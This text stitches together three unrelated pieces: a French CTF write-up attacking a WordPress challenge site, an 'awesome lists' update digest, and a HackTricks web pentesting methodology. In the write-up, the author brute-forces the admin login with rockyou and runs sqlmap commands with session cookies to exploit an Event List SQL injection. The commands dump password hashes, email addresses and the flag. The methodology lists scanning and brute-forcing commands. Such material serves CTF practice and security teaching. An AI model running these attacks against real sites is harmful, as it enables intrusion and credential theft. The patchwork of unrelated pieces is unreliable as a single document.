**Web - The News Hacker - 150pts**
Enoncé :
```
Only admin can see the flag :)
ctf.sharif.edu:8082
Hint: Weak password!
```
**Résolution :**
Le site est un wordpress :
![Alt](img/wordpress.png "Accueil")
On commence par le scanner pour identifier les différentes versions des plugins et lister les utilisateurs.
```BASH
wpscan --url http://ctf.sharif.edu:8082 --enumerate u
```
**Résultat :**
```
Deux utilisateurs sont présent sur le système :
+----+-----------+-----------+
| Id | Login | Name |
+----+-----------+-----------+
| 1 | admin | admin |
| 2 | organizer | organizer |
+----+-----------+-----------+
```
Un plugin est vulnérable à une injection SQL authentifié :
```
[!] Title: Event List <= 0.7.8 - Authenticated SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8846
Reference: https://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
Reference: https://plugins.trac.wordpress.org/changeset/1676971/event-list
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9429
[i] Fixed in: 0.7.9
```
On bruteforce l'accès à l'administration du wordpress via la page **wp-login.php** avec burp et le dictionnaire rockyou
![Alt](img/burp.png "Bruteforce")
On trouve le couple d'identifiant : organizer / password
On se connecte grâce aux identitifants
![Alt](img/admin.png "Admin page")
Nous avons maintenant un cookie de session valide pour exploiter l'injection sql en mode authentifié : [CVE-2017-9429](https://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/)
Avec SQLMAP on injecte sur le paramètre **id**:
```BASH
sqlmap -u "http://ctf.sharif.edu:8082/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(2)" --cookie="wordpress_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cc2da9849c840a893d0cf33bf38bd75a9a7af23367151b471e912be06963bb21b; csrftoken=gMHcyH05di9Nbae4Nob9iz8jXKN7twztLs2V0Zl55nC4mDQJEoEBxFf1ClV1cX5O; sessionid=h7xiiydxhmcqd3u9vij4p1c75fwaiis1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cabf11d732008c12922d0e7101ddcf906203f47813221521c84eb51bdf1180e64; wp-settings-2=libraryContent%3Dupload%26mfold%3Do%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-2=1517567162" -p id
```
L'injection fonctionne, il ne reste plus qu'à afficher le contenu de la base de données désirée.
La première idée à été de dumper le mot de passe du compte : admin
```BASH
sqlmap -u "http://ctf.sharif.edu:8082/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(2)" --cookie="wordpress_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cc2da9849c840a893d0cf33bf38bd75a9a7af23367151b471e912be06963bb21b; csrftoken=gMHcyH05di9Nbae4Nob9iz8jXKN7twztLs2V0Zl55nC4mDQJEoEBxFf1ClV1cX5O; sessionid=h7xiiydxhmcqd3u9vij4p1c75fwaiis1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cabf11d732008c12922d0e7101ddcf906203f47813221521c84eb51bdf1180e64; wp-settings-2=libraryContent%3Dupload%26mfold%3Do%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-2=1517567162" -p id -D wp_blog -T wp_users --dump
Database: wp_blog
Table: wp_users
[2 entries]
+----+----------+------------------------------------+------------+-------------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url | user_pass | user_login | user_email | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+----------+------------------------------------+------------+-------------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1 | <blank> | $P$BlswVddCYusVLzt8kbJ2IgtYAzjfFV. | admin | info@besthackers.com | 0 | admin | admin | 2018-01-01 07:38:36 | <blank> |
| 2 | <blank> | $P$ByyRxRMg.AIWvtbM1Jf3A0Obt/oEJy1 | organizer | organizer@sharifctf.com | 0 | organizer | organizer | 2018-01-08 04:16:36 | 1515384996:$P$B8XHeMJAc23PiQ.TKcINv40EoS4jUV1 |
+----+----------+------------------------------------+------------+-------------------------+-------------+--------------+---------------+--------------------
```
Après une heure de bruteforce offline avec hashcat le mot de passe n'a pas été trouvé.
On dump alors tous les posts du wordpress en espérant en trouver un de caché.
```BASH
sqlmap -u "http://ctf.sharif.edu:8082/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(2)" --cookie="wordpress_0a035233da76ab47b383406952116587=organizer%7C1517745041%7CaFwFCjTZRnFNkPPS2tgadihYPOnZegBYj4uGZLE1d4h%7C3fc24876b5521be0e1075ce103b2f76d4d044237e9f5682d978e7a281e313f34; csrftoken=gMHcyH05di9Nbae4Nob9iz8jXKN7twztLs2V0Zl55nC4mDQJEoEBxFf1ClV1cX5O; sessionid=h7xiiydxhmcqd3u9vij4p1c75fwaiis1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0a035233da76ab47b383406952116587=organizer%7C1517745041%7CaFwFCjTZRnFNkPPS2tgadihYPOnZegBYj4uGZLE1d4h%7C8d85976e7e3fe45466237298692e0a71ef640c92b24fc99e1f7c6b2c771bc251; wp-settings-2=libraryContent%3Dbrowse%26mfold%3Do%26editor%3Dhtml%26uploader%3D1; wp-settings-time-2=1517572245; XSRF-TOKEN=eyJpdiI6ImpzTE9IT01LWEZhMVdIY3A0NURKTVE9PSIsInZhbHVlIjoiRG1qZVkyTTkxU2VsMlJJNzFFbiswbkVEU2dPZzYzNEZidHIwVkE5QnVQZnJ3XC9pcHpIUnJDOE9ZTCtFMUhJWm52WnBTM2lUdTNqRGlNNXhqSk9IRHVnPT0iLCJtYWMiOiIyM2U0M2I2NGUyYThlODZkMjE5ZGM0MTFjNWM5NzczNmVkOGE4ZjUyNjBiMjg5MWY1ZjNhYTczMzFlOTc3N2IxIn0%3D; laravel_session=eyJpdiI6IlRodmZ3YUc5K2pHSzJkUmtBSWwzMUE9PSIsInZhbHVlIjoibkhXXC9mQ2RRMWFkWkpEc0FYdk5qVHhZVlZZSGpaNFdyWU1RMStwSzdHU0U3RkJua3RMM1l4bHFJbXB3Zzd5NW44UUJ4U3E0YnRMcWlJb0Rzd21oYmlBPT0iLCJtYWMiOiI3ZWVlMGYyYWIyMDgxOWFkYjZjN2Y0YzNhZDAyZTdhNDMzMWM1M2EzMTE1ZjRhN2M0YjM2OWM0ZDU0YzI5MGQ5In0%3" -p id -D wp_blog -T wp_posts --dump
[13:22:35] [INFO] retrieved: "25","0","open","http://10.0.3.189/?p=25","0","open","","1","Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}","","2018-01-08 04:14:21","2018-01-08 04:14:21","","","2018-01-08 10:5...
```
By team Beers4Flags
```
________
| |
| #BFF |
|________|
_.._,_|,_
( | )
]~,"-.-~~[
.=] Beers ([
| ]) 4 ([
'=]) Flags [
|:: ' |
~~----~~
```
|
# Awesome List Updates on Oct 12, 2017
11 awesome lists updated today.
[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung)
## [1. Awesome Idris](/content/joaomilho/awesome-idris/README.md)
### Contents / Books
* [Type Driven Development With Idris](https://www.manning.com/books/type-driven-development-with-idris) - Most important book published so far.
### Contents / Presentations
* [Idris: General Purpose Programming with Dependent Types](https://www.youtube.com/watch?v=vkIlW797JN8) - Presentation by Edwin Brady, Idris' creator.
### Contents / Projects
* [GitHub's trending Idris repos](https://github.com/trending/idris)
* [iridium (⭐201)](https://github.com/puffnfresh/iridium) - xmonad with the X11 abstracted and configured with Idris.
* [lightyear (⭐235)](https://github.com/ziman/lightyear) - Parser combinators for Idris.
* [quantities (⭐151)](https://github.com/timjb/quantities) Type-safe physical computations and unit conversions in Idris.
* [idris-type-providers (⭐84)](https://github.com/david-christiansen/idris-type-providers) - Type provider library for Idris.
* [IdrisScript (⭐88)](https://github.com/idris-hackers/IdrisScript) - FFI Bindings to interact with the unsafe world of JavaScript.
* [idris-containers (⭐94)](https://github.com/jfdm/idris-containers) - Various data structures for use in the Idris Language.
* [IdrisSqlite (⭐39)](https://github.com/david-christiansen/IdrisSqlite) - Effectful bindings for SQLite.
* [idris-http (⭐39)](https://github.com/uwap/idris-http) - HTTP library for Idris.
* [RingIdris (⭐20)](https://github.com/FranckS/RingIdris) - Ring solver for Idris.
* [specdris (⭐57)](https://github.com/pheymann/specdris) - Test framework for Idris.
* [idris-config (⭐19)](https://github.com/jfdm/idris-config) - Parsers for various configuration files written in Idris.
* [probability (⭐32)](https://github.com/BlackBrane/probability) - Probabilistic computation in Idris.
* [idris-protobuf (⭐28)](https://github.com/google/idris-protobuf) - Partial implementation of Protocol Buffers in Idris.
* [idris-free (⭐25)](https://github.com/idris-hackers/idris-free) - Free Monads and useful constructions to work with them.
### Contents / Backends
* [idris-jvm (⭐378)](https://github.com/mmhelloworld/idris-jvm) - JVM bytecode backend for Idris.
* [idris-llvm (⭐77)](https://github.com/idris-hackers/idris-llvm) - LLVM backend.
* [idris-erlang (⭐190)](https://github.com/lenary/idris-erlang) - Erlang backend.
* [idris-malfunction (⭐80)](https://github.com/stedolan/idris-malfunction) - Experimental Malfunction (OCaml internal representation) backend.
### Contents / Community
* [GitHub organization](https://github.com/idris-hackers)
## [2. Awesome Deep Learning Resources](/content/guillaume-chevalier/Awesome-Deep-Learning-Resources/README.md)
### Papers / Convolutional Neural Networks
* [Densely Connected Convolutional Networks](https://arxiv.org/pdf/1608.06993.pdf) - Best Paper Award at CVPR 2017, yielding improvements on state-of-the-art performances on CIFAR-10, CIFAR-100 and SVHN datasets, this new neural network architecture is named DenseNet.
## [3. Awesome Ddd](/content/heynickc/awesome-ddd/README.md)
### Books
* [Writing Great Specifications](https://www.manning.com/books/writing-great-specifications) - Writing Great Specifications is an example-rich tutorial that teaches you how to write good Gherkin specification documents that take advantage of Specification by Example's benefits.
## [4. Awesome Ctf](/content/apsdehal/awesome-ctf/README.md)
### Wargames
* [Hack The Box](https://www.hackthebox.eu) - Weekly CTFs for all types of security enthusiasts.
## [5. Awesome Android](/content/JStumpp/awesome-android/README.md)
### GUI / Video
* [VideoPlayView (⭐90)](https://github.com/MarcinMoskala/VideoPlayView) - Custom Android view with video player, play/stop, loader and placeholder image.
## [6. Awesome Swift](/content/matteocrippa/awesome-swift/README.md)
### Dependency Injection
* [Corridor (⭐60)](https://github.com/symentis/Corridor) - A Coreader-like Dependency Injection μFramework.
### Utility / Barcode
* [Closures (⭐1.7k)](https://github.com/vhesener/Closures) - Swifty closures for UIKit and Foundation.
## [7. Awesome Vue](/content/vuejs/awesome-vue/README.md)
### Resources / Community
* [VueJS Thailand - Facebook Group](https://www.facebook.com/groups/VuejsThailand/)
### Resources / Tutorials
* [Async in VueJS part 1](https://medium.com/js-dojo/async-in-vue-js-part-1-28d96f751a2e)
* [Async in VueJS part 2](https://medium.com/js-dojo/async-in-vuejs-part-2-45e81c836e38)
## [8. Awesome Micro Npm Packages](/content/parro-it/awesome-micro-npm-packages/README.md)
### Modules / Function
* [throttle-debounce (⭐886)](https://github.com/niksy/throttle-debounce) - Throttle/debounce your functions.
## [9. Awesome Dotnet Core](/content/thangchung/awesome-dotnet-core/README.md)
### Articles / Workflow
* Basic knowledge
* [Microsoft architectural overview of comprehensive BikeSharing360 suite of demo apps with related videos](https://blogs.msdn.microsoft.com/visualstudio/2016/12/14/connectdemos-2016-bikesharing360-on-github/)
* [Porting a .NET Framework library to .NET Core](https://www.codeproject.com/Articles/1190475/Porting-a-NET-Framework-library-to-NET-Core)
* [The 68 things the CLR does before executing a single line of your code](http://mattwarren.org/2017/02/07/The-68-things-the-CLR-does-before-executing-a-single-line-of-your-code/)
* The comparison between .NET Core and Nodejs at [here](https://manuel-rauber.com/2016/03/07/node-js-asp-net-core-1-0-a-usage-comparison/), [here](https://gist.github.com/ilyaigpetrov/f6df3e6f825ae1b5c7e2) and [here (⭐46)](https://github.com/thinktecture/nodejs-aspnetcore-webapi)
* [Understanding ASP.NET Core Initialization](http://developer.telerik.com/featured/understanding-asp-net-core-initialization/)
* [Why you should join .NET Core and ASP.NET Core train](https://codingblast.com/why-you-should-join-asp-net-core/)
## [10. Awesome Open Source Supporters](/content/zachflower/awesome-open-source-supporters/README.md)
### Exception Reporting
* [BugSnag](https://www.bugsnag.com/) `requires-approval` - Exception tracking and reporting.
## [11. Awesome No Login Web Apps](/content/aviaryan/awesome-no-login-web-apps/README.md)
### Miscellaneous / Others
* [AlarmDJ](https://alarmdj.com) - Online Alarm clock, use MP3 files and YouTube videos as alarm.
---
- Prev: [Oct 13, 2017](/content/2017/10/13/README.md)
- Next: [Oct 11, 2017](/content/2017/10/11/README.md) |
# 80,443 - Pentesting Web Methodology
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or follow me on Twitter 🐦**[**@carlospolopm**](https://twitter.com/carlospolopm).
**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
Don't forget to** give ⭐ on the **github** to motivate me to continue developing this book.
## Basic Info
The web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists.
**Default port:** 80 \(HTTP\), 443\(HTTPS\)
```bash
PORT STATE SERVICE
80/tcp open http
443/tcp open ssl/https
```
```bash
nc -v domain.com 80 # GET / HTTP/1.0
openssl s_client -connect domain.com:443 # GET / HTTP/1.0
```
## Web API Guidance
{% page-ref page="web-api-pentesting.md" %}
## Methodology summary
> In this methodology we are going to suppose that you are going to a attack a domain \(or subdomain\) and only that. So, you should apply this methodology to each discovered domain, subdomain or IP with undetermined web server inside the scope.
* [ ] Start by **identifying** the **technologies** used by the web server. Look for **tricks** to keep in mind during the rest of the test if you can successfully identify the tech.
* [ ] Any **known vulnerability** of the version of the technology?
* [ ] Using any **well known tech**? Any **useful trick** to extract more information?
* [ ] Any **specialised scanner** to run \(like wpscan\)?
* [ ] Launch **general purposes scanners**. You never know if they are going to find something or if the are going to find some interesting information.
* [ ] Start with the **initial checks**: **robots**, **sitemap**, **404** error and **SSL/TLS scan** \(if HTTPS\).
* [ ] Start **spidering** the web page: It's time to **find** all the possible **files, folders** and **parameters being used.** Also, check for **special findings**.
* [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._
* [ ] **Directory Brute-Forcing**: Try to brute force all the discovered folders searching for new **files** and **directories**.
* [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
* [ ] **Backups checking**: Test if you can find **backups** of **discovered files** appending common backup extensions.
* [ ] **Brute-Force parameters**: Try to **find hidden parameters**.
* [ ] Once you have **identified** all the possible **endpoints** accepting **user input**, check for all kind of **vulnerabilities** related to it.
* [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
## Server Version \(Vulnerable?\)
### Identify
Check if there are **known vulnerabilities** for the server **version** that is running.
The **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com/)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
```
Search **for** [**vulnerabilities of the web application** **version**](../../search-exploits.md)
**Check if any WAF**
* [**https://github.com/EnableSecurity/wafw00f**](https://github.com/EnableSecurity/wafw00f)
* [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
* [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
### Web tech tricks
Some **tricks** for **finding vulnerabilities** in different well known **technologies** being used:
* [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
* [**Apache**](apache.md)
* [**Artifactory**](artifactory-hacking-guide.md)
* [**Buckets**](buckets/)
* [**CGI**](cgi.md)
* [**Drupal**](drupal.md)
* [**Flask**](flask.md)
* [**Git**](git.md)
* [**Golang**](golang.md)
* [**GraphQL**](graphql.md)
* [**H2 - Java SQL database**](h2-java-sql-database.md)
* [**IIS tricks**](iis-internet-information-services.md)
* [**JBOSS**](jboss.md)
* [**Jenkins**](jenkins.md)
* [**Jira**](jira.md)
* [**Joomla**](joomla.md)
* [**JSP**](jsp.md)
* [**Laravel**](laravel.md)
* [**Moodle**](moodle.md)
* [**Nginx**](nginx.md)
* [**PHP \(php has a lot of interesting tricks that could be exploited\)**](php-tricks-esp/)
* [**Python**](python.md)
* [**Spring Actuators**](spring-actuators.md)
* [**Symphony**](symphony.md)
* [**Tomcat**](tomcat.md)
* [**VMWare**](vmware-esx-vcenter....md)
* [**Web API Pentesting**](web-api-pentesting.md)
* [**WebDav**](put-method-webdav.md)
* [**Werkzeug**](werkzeug.md)
* [**Wordpress**](wordpress.md)
* [**Electron Desktop \(XSS to RCE\)**](xss-to-rce-electron-desktop-apps.md)
_Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._
If the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks \(and let me know!\).
## Source Code Review
If the **source code** of the application is available in **github**, apart of performing by **your own a White box test** of the application there is **some information** that could be **useful** for the current **Black-Box testing**:
* Is there a **Change-log or Readme or Version** file or anything with **version info accessible** via web?
* How and where are saved the **credentials**? Is there any \(accessible?\) **file** with credentials \(usernames or passwords\)?
* Are **passwords** in **plain text**, **encrypted** or which **hashing algorithm** is used?
* Is it using any **master key** for encrypting something? Which **algorithm** is used?
* Can you **access any of these files** exploiting some vulnerability?
* Is there any **interesting information in the github** \(solved and not solved\) **issues**? Or in **commit history** \(maybe some **password introduced inside an old commit**\)?
{% page-ref page="code-review-tools.md" %}
## Automatic scanners
### General purpose automatic scanners
```bash
nikto -h <URL>
whatweb -a 4 <URL>
wapiti -u <URL>
W3af
zaproxy #You can use an API
nuclei -t nuclei-templates
```
### CMS scanners
If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. \(GUI\)
[**VulnX**](https://github.com/anouarbensaad/vulnx)**: Joomla,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart
CMSMap**: [**\(W\)ordpress**](wordpress.md)**, \(J\)oomla,** [**\(D\)rupal**](drupal.md) **or** [**\(M\)oodle**](moodle.md)
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**, Joomla,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
```bash
cmsmap [-f W] -F -d <URL>
wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> At this point you should already have some information of the web server being used by the client \(if any data is given\) and some tricks to keep in mind during the test. If you are lucky you have even found a CMS and run some scanner.
## Step-by-step Web Application Discovery
> From this point we are going to start interacting with the web application.
### Initial checks
#### Default pages with interesting info:
* /robots.txt
* /sitemap.xml
* /crossdomain.xml
* /clientaccesspolicy.xml
* /.well-known/
* Check also comments in the main and secondary pages.
#### Forcing errors
Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.
* Access **fake pages** like /whatever\_fake.php \(.aspx,.html,.etc\)
* **Add "\[\]", "\]\]", and "\[\["** in **cookie values** and **parameter** values to create errors
* Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
* Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
#### Check if you can upload files \([PUT verb, WebDav](put-method-webdav.md)\)
If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
* **Brute Force** credentials
* **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.
#### SSL/TLS vulnerabilites
* If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**
* If the application is **sending sensitive data \(passwords\) using HTTP**. Then it's a high vulnerability.
Use [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** \(In Bug Bounty programs probably these kind of vulnerabilities won't be accepted\) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
## You can also use other tools, by testssl.sh at this momment is the best one (I think)
sslscan <host:port>
sslyze --regular <ip:port>
```
Information about SSL/TLS vulnerabilities:
* [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/)
* [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)
### Spidering
Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
* [**gospider**](https://github.com/jaeles-project/gospider) \(go\): HTML spider, LinkFinder in JS files and external sources \(Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com\).
* [**hakrawler**](https://github.com/hakluke/hakrawler) \(go\): HML spider, with LinkFider for JS files and Archive.org as external source.
* [**dirhunt**](https://github.com/Nekmo/dirhunt) \(python\): HTML spider, also indicates "juicy files".
* [**evine** ](https://github.com/saeeddhqan/evine)\(go\): Interactive CLI HTML spider. It also searches in Archive.org
* [**meg**](https://github.com/tomnomnom/meg) \(go\): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) \(go\): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
* [**gau**](https://github.com/lc/gau) go\): HTML spider that uses external providers \(wayback, otx, commoncrawl\)
* [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
* [**galer**](https://github.com/dwisiswant0/galer) \(go\): HTML spider with JS rendering capabilities.
* [**LinkFinder**](https://github.com/GerbenJavado/LinkFinder) \(python\): HTML spider, with JS beautify capabilities capable of search new paths in JS files. It could be worth it also take a look to [JSScanner](https://github.com/dark-warlord14/JSScanner), which is a wrapper of LinkFinder.
* [**JSParser**](https://github.com/nahamsec/JSParser) \(python2.7\): A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests. Looks like unmaintained.
* [**relative-url-extractor**](https://github.com/jobertabma/relative-url-extractor) \(ruby\): Given a file \(HTML\) it will extract URLs from it using nifty regular expression to find and extract the relative URLs from ugly \(minify\) files.
* [**JSFScan**](https://github.com/KathanP19/JSFScan.sh) \(bash, several tools\): Gather interesting information from JS files using several tools.
* [**subjs**](https://github.com/lc/subjs) \(go\): Find JS files.
* [**page-fetch**](https://github.com/detectify/page-fetch) \(go\): Load a page in a headless browser and print out all the urls loaded to load the page.
### Brute Force directories and files
Start **brute-forcing** from the root folder and be sure to brute-force **all** the **directories found** using **this method** and all the directories **discovered** by the **Spidering** \(you can do this brute-forcing **recursively** and appending at the beginning of the used wordlist the names of the found directories\).
Tools:
* **Dirb** / **Dirbuster** - Included in Kali, **old** \(and **slow**\) but functional. Allow auto-signed certificates and recursive search. Too slow compared with th other options.
* [**Dirsearch**](https://github.com/maurosoria/dirsearch) \(python\)**: It doesn't allow auto-signed certificates but** allows recursive search.
* [**Gobuster**](https://github.com/OJ/gobuster) \(go\): It allows auto-signed certificates, it **doesn't** have **recursive** search.
* [**Feroxbuster**](https://github.com/epi052/feroxbuster) **- Fast, supports recursive search.**
* [**wfuzz**](https://github.com/xmendez/wfuzz) `wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ`
* [**ffuf** ](https://github.com/ffuf/ffuf)- Fast: `ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ`
**Recommended dictionaries:**
* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/bf\_directories.txt](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/bf_directories.txt)
* [**Dirsearch** included dictionary](https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt)
* [http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10](http://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
* [Assetnote wordlists](https://wordlists.assetnote.io/)
* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content)
* raft-large-directories-lowercase.txt
* directory-list-2.3-medium.txt
* RobotsDisallowed/top10000.txt
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
* _/usr/share/wordlists/dirb/common.txt_
* _/usr/share/wordlists/dirb/big.txt_
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
### What to check on each file found
* [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
* **File Backups**: Once you have found all the files, look for backups of all the executable files \("_.php_", "_.aspx_"...\). Common variations for naming a backup are: _file.ext~, \#file.ext\#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac).
* **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
* _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)\_\_
* _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)\_\_
* _Assetnote “parameters\_top\_1m”:_ [https://wordlists.assetnote.io/](https://wordlists.assetnote.io/)\_\_
* _nullenc0de “params.txt”:_ [https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773](https://gist.github.com/nullenc0de/9cb36260207924f8e1787279a05eb773)
* **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
* If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** \(using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser\). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
* **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [keyhacks](https://github.com/streaak/keyhacks), [**zile**](https://github.com/xyele/zile.git)**,** [truffleHog](https://github.com/dxa4481/truffleHog/), [SecretFinder](https://github.com/m4ll0k/SecretFinder), [RegHex](https://github.com/l4yton/RegHex%29\).
* Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP\_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
* **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/).
### Special findings
**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.
#### **Interesting files**
* Look for **links** to other files inside the **CSS** files.
* [If you find a _**.git**_ file some information can be extracted](git.md)
* If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.
* If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them.
* **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**
* You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.
* **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
* **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io/), [http://jsnice.org/](http://jsnice.org/)
